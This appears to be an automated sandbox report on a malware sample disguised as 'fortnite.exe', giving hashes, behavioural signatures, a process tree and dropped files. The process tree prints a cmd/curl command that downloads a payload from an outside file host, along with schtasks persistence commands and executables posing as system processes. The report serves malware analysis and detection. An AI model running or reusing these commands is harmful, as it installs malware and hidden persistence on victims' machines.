Analysis

  • max time kernel
    151s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 15:41

General

  • Target

    fortnite.exe

  • Size

    1.4MB

  • MD5

    fe46f964b97f65038b33d792041d5ae1

  • SHA1

    78c5f038a61bd6cc176aa6ba404ce3b1066dd3ac

  • SHA256

    5b1344b5474239635dbccf34f061111a440fdf309fc106ab7890902452d9e1f3

  • SHA512

    8f630383500a97b11174b39206bc63732c67e9ee58430f64efa708565ed9a01b737e133639f0a56f936fc9d13f0e234e655c1f2f9c3683931e8c1fa11a507d0f

  • SSDEEP

    24576:PFOaIhahEyuRAmfnkuGKFDflpC+bKlAtc06cd:tUhfnsGzH

Malware Config

Signatures

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fortnite.exe
    "C:\Users\Admin\AppData\Local\Temp\fortnite.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2044
    • \??\c:\users\admin\appdata\local\temp\fortnite.exe 
      c:\users\admin\appdata\local\temp\fortnite.exe 
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
        3⤵
          PID:2916
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          3⤵
            PID:2920
        • C:\Windows\Resources\Themes\icsys.icn.exe
          C:\Windows\Resources\Themes\icsys.icn.exe
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1796
          • \??\c:\windows\resources\themes\explorer.exe
            c:\windows\resources\themes\explorer.exe
            3⤵
            • Modifies visiblity of hidden/system files in Explorer
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Drops file in System32 directory
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2124
            • \??\c:\windows\resources\spoolsv.exe
              c:\windows\resources\spoolsv.exe SE
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1192
              • \??\c:\windows\resources\svchost.exe
                c:\windows\resources\svchost.exe
                5⤵
                • Modifies visiblity of hidden/system files in Explorer
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Drops file in System32 directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2936
                • \??\c:\windows\resources\spoolsv.exe
                  c:\windows\resources\spoolsv.exe PR
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:2220
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:44 /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2844
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:45 /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2540
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:46 /f
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3008
            • C:\Windows\Explorer.exe
              C:\Windows\Explorer.exe
              4⤵
                PID:2740

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Windows\Resources\Themes\explorer.exe

          Filesize

          135KB

          MD5

          a711f0925f42a810499b8963f248f81d

          SHA1

          e2d108438a52befe6ff8c76f830373224276ebd0

          SHA256

          ca0c9438d7e0bb0abe5cd9ea49028d9bf53de2394d63991a036448eec36adcc7

          SHA512

          fc374f708ae6cb6fb558fcbcca9a30e3e0d4764f77cb3208a553815b063c762ab97d9f1aa2eafe5cdad36f04a3d086bce2d58767ff52b5b44c13775f7ee42634

        • \Users\Admin\AppData\Local\Temp\fortnite.exe 

          Filesize

          1.2MB

          MD5

          3287792eb50754ea8b3639bca36a8a99

          SHA1

          d46b073edbbfcd8027d2df2b1ccb93f90bec3319

          SHA256

          9c3dd5e7ce8aa6114c6d881a64eefb47f5e6557bbc84cbfa705318674b43fecc

          SHA512

          fada9632e159e6225997c8c6d67fb09f4ce48c1c444d0205ceb8a4004f7006eb7c55ce2823d1f33672bbea36d29e6111cd5021b63ee2fbd3f6dbf2847ce78b38

        • \Windows\Resources\Themes\icsys.icn.exe

          Filesize

          135KB

          MD5

          db2a3be4d0ba7fbe7984689f57969053

          SHA1

          22eeabb26614ba2a32b0869ae544c67c02f9262b

          SHA256

          2055a054d6084815d3e23fdc1cfa776bea0cf21a2eb6194a0d453eec3dead956

          SHA512

          7b3cab337dfe217824ad754c02561f2bdb82eb92d3462503212870e4adb2f6b1e10392e3dc127883a3ef8c39e1c0d9ed946609831c114cc42746fa0f680390d4

        • \Windows\Resources\spoolsv.exe

          Filesize

          135KB

          MD5

          49af1e57561db06cf5460d2bd4bfac27

          SHA1

          06fd729a5828e737607618caac0b88c820f304cf

          SHA256

          fa61bb735e38be8e69149c644c92a270dd5f805bbf2cf07db57fa090845be4bb

          SHA512

          78c57b3c3410c37d998ea37a8c624d4b6e64f646f6e2aa63cbcc947b9a654411dc20e29109cca8e95e5d8ca75966bfd962ed160fcb16a583fc7e5b62439d7385

        • \Windows\Resources\svchost.exe

          Filesize

          135KB

          MD5

          a74cc12915ee1a4baee804ef46526b9e

          SHA1

          ac979475cda92036255b5dae36fef12bda2e7539

          SHA256

          1b249b1b4494cb278cc37dde36799a89898650455493a31457aa4538fcfe5945

          SHA512

          896322b4cbfb52e445ff3e7341dd19e70706bf6826b4425120911dae3898572a8ac295067afecc1d87006a5c07153640ef4f106167c90d470b3755fb3acfd1a7

        • memory/1192-57-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/1796-25-0x0000000000200000-0x000000000021F000-memory.dmp

          Filesize

          124KB

        • memory/1796-58-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2044-11-0x00000000002C0000-0x00000000002DF000-memory.dmp

          Filesize

          124KB

        • memory/2044-0-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2044-59-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2124-60-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2220-56-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB

        • memory/2936-51-0x00000000002F0000-0x000000000030F000-memory.dmp

          Filesize

          124KB

        • memory/2936-61-0x0000000000400000-0x000000000041F000-memory.dmp

          Filesize

          124KB